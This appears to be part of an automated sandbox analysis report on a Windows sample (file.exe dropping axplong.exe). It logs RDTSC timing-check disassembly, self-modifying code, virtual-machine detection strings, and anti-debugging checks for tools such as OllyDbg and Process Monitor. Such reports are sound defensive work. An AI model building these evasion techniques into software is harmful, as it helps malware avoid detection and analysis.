                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0E13 second address: 4DA0E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0E17 second address: 4DA0E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F43A4BB4C31h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0E45 second address: 4DA0E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0EC2 second address: 4DA0EF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43A4BB4C37h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D461 second address: 87D465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50322 second address: 4D503DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F43A4BB4C34h 0x00000011 sbb ecx, 1A76BC88h 0x00000017 jmp 00007F43A4BB4C2Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F43A4BB4C38h 0x00000023 and ah, FFFFFFE8h 0x00000026 jmp 00007F43A4BB4C2Bh 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f jmp 00007F43A4BB4C2Fh 0x00000034 push esi 0x00000035 movsx edi, cx 0x00000038 pop eax 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F43A4BB4C2Dh 0x00000042 xor cl, FFFFFFB6h 0x00000045 jmp 00007F43A4BB4C31h 0x0000004a popfd 0x0000004b pushad 0x0000004c mov al, E5h 0x0000004e mov ax, dx 0x00000051 popad 0x00000052 popad 0x00000053 mov ebp, esp 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F43A4BB4C30h 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503DB second address: 4D504B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4FCF6A1h 0x00000009 jmp 00007F43A4FCF69Bh 0x0000000e popfd 0x0000000f mov ebx, esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push FFFFFFFEh 0x00000016 jmp 00007F43A4FCF6A2h 0x0000001b call 00007F43A4FCF699h 0x00000020 pushad 0x00000021 call 00007F43A4FCF69Eh 0x00000026 mov edx, ecx 0x00000028 pop esi 0x00000029 mov dl, 61h 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov dx, 006Ah 0x00000032 pushfd 0x00000033 jmp 00007F43A4FCF69Bh 0x00000038 xor eax, 6AC5B90Eh 0x0000003e jmp 00007F43A4FCF6A9h 0x00000043 popfd 0x00000044 popad 0x00000045 mov eax, dword ptr [esp+04h] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F43A4FCF69Ah 0x00000052 or ax, 0F88h 0x00000057 jmp 00007F43A4FCF69Bh 0x0000005c popfd 0x0000005d pushfd 0x0000005e jmp 00007F43A4FCF6A8h 0x00000063 sbb cl, FFFFFFE8h 0x00000066 jmp 00007F43A4FCF69Bh 0x0000006b popfd 0x0000006c popad 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504B2 second address: 4D50505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov bh, 96h 0x0000000f pop esi 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007F43A4BB4C30h 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F43A4BB4C37h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50505 second address: 4D5050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5050B second address: 4D50520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 0E07E33Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50520 second address: 4D5056D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 693ECAC6h 0x00000010 pushad 0x00000011 jmp 00007F43A4FCF69Eh 0x00000016 mov ah, 96h 0x00000018 popad 0x00000019 mov eax, dword ptr fs:[00000000h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F43A4FCF6A8h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5056D second address: 4D50575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50575 second address: 4D50594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43A4FCF6A5h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50695 second address: 4D50699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50699 second address: 4D5069D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5069D second address: 4D506A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D506A3 second address: 4D506D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F43A4FCF6A0h 0x0000000f push eax 0x00000010 jmp 00007F43A4FCF69Bh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D506D5 second address: 4D506D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D506D9 second address: 4D506DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D506DF second address: 4D50732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [7751B370h] 0x0000000e jmp 00007F43A4BB4C30h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 jmp 00007F43A4BB4C30h 0x0000001b xor eax, ebp 0x0000001d pushad 0x0000001e mov cx, bx 0x00000021 mov ch, bl 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F43A4BB4C31h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50732 second address: 4D50742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF69Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50742 second address: 4D50746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50746 second address: 4D50755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50755 second address: 4D50759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50759 second address: 4D5075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5075F second address: 4D50793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, cx 0x00000010 jmp 00007F43A4BB4C36h 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D508EF second address: 4D508F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D508F3 second address: 4D508F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D508F9 second address: 4D50951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4FCF6A3h 0x00000009 and esi, 36A6650Eh 0x0000000f jmp 00007F43A4FCF6A9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [ebp-24h], ebx 0x0000001b pushad 0x0000001c mov esi, 496DC8B3h 0x00000021 popad 0x00000022 test ebx, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F43A4FCF6A0h 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50951 second address: 4D50956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50956 second address: 4D509C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F441769E9B4h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F43A4FCF6A9h 0x00000016 jmp 00007F43A4FCF69Bh 0x0000001b popfd 0x0000001c jmp 00007F43A4FCF6A8h 0x00000021 popad 0x00000022 cmp ebx, FFFFFFFFh 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F43A4FCF6A7h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D509C1 second address: 4D509D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C34h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D509D9 second address: 4D50322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F441769E930h 0x0000000d jne 00007F43A4FCF6B9h 0x0000000f xor ecx, ecx 0x00000011 mov dword ptr [esi], ecx 0x00000013 mov dword ptr [esi+04h], ecx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], ecx 0x0000001c mov dword ptr [esi+10h], ecx 0x0000001f mov dword ptr [esi+14h], ecx 0x00000022 mov ecx, dword ptr [ebp-10h] 0x00000025 mov dword ptr fs:[00000000h], ecx 0x0000002c pop ecx 0x0000002d pop edi 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 mov esp, ebp 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 nop 0x00000037 pop ebp 0x00000038 ret 0x00000039 add esi, 18h 0x0000003c pop ecx 0x0000003d cmp esi, 006C5678h 0x00000043 jne 00007F43A4FCF680h 0x00000045 push esi 0x00000046 call 00007F43A4FCFF03h 0x0000004b push ebp 0x0000004c mov ebp, esp 0x0000004e push dword ptr [ebp+08h] 0x00000051 call 00007F43A96A2AB6h 0x00000056 mov edi, edi 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F43A4FCF6A2h 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40D6E second address: 4D40DA2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F43A4BB4C38h 0x00000008 adc esi, 3FBA0238h 0x0000000e jmp 00007F43A4BB4C2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 movzx eax, dx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DA2 second address: 4D40E2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007F43A4FCF69Ah 0x0000000e pushfd 0x0000000f jmp 00007F43A4FCF6A2h 0x00000014 sbb cx, BBC8h 0x00000019 jmp 00007F43A4FCF69Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esp], ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F43A4FCF6A4h 0x0000002a sbb eax, 043FBE28h 0x00000030 jmp 00007F43A4FCF69Bh 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 pushfd 0x00000039 jmp 00007F43A4FCF6A6h 0x0000003e xor cx, 7088h 0x00000043 jmp 00007F43A4FCF69Bh 0x00000048 popfd 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E2F second address: 4D40E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E54 second address: 4D40E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E71 second address: 4D40E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43A4BB4C2Dh 0x00000011 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A7865C second address: A78674 instructions: 0x00000000 rdtsc 0x00000002 je 00007F43A4FCF698h 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F43A4FCF698h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A1CC second address: A8A1D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A1D4 second address: A8A1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A1D8 second address: A8A1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A1DC second address: A8A1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A315 second address: A8A31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6CE90E instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6CE822 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 873FB5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8F9E72 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 90E90E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 90E822 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: AB3FB5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: B39E72 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04DA0DD4 rdtsc 0_2_04DA0DD4
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 418
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 380
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 8210
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692 Thread sleep count: 54 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692 Thread sleep time: -108054s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7688 Thread sleep count: 56 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7688 Thread sleep time: -112056s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664 Thread sleep count: 418 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664 Thread sleep time: -836418s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7652 Thread sleep count: 380 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7652 Thread sleep time: -11400000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7764 Thread sleep time: -1080000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7668 Thread sleep count: 57 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7668 Thread sleep time: -114057s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7684 Thread sleep count: 59 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7684 Thread sleep time: -118059s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7672 Thread sleep count: 59 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7672 Thread sleep time: -118059s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664 Thread sleep count: 8210 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664 Thread sleep time: -16428210s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                    Source: axplong.exe, axplong.exe, 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: file.exe, 00000000.00000002.1489236339.0000000000E00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.1485477807.0000000000852000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1518990398.0000000000A92000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000003.00000002.1519922749.0000000000A92000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04DA0DD4 rdtsc 0_2_04DA0DD4
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 8_2_008D645B mov eax, dword ptr fs:[00000030h] 8_2_008D645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 8_2_008DA1C2 mov eax, dword ptr fs:[00000030h] 8_2_008DA1C2
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: file.exe, 00000000.00000002.1485477807.0000000000852000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1518990398.0000000000A92000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000003.00000002.1519922749.0000000000A92000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: Program Manager
                    Source: axplong.exe | Binary or memory string: 0> Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 8_2_008BD312 cpuid 8_2_008BD312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 8_2_008BCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 8_2_008BCB1A

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 2.2.axplong.exe.8a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.axplong.exe.8a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.axplong.exe.8a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000003.1978884229.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000003.1476249631.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000003.1475590462.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.1445064913.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1485335503.0000000000661000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1519199500.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.1518475574.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
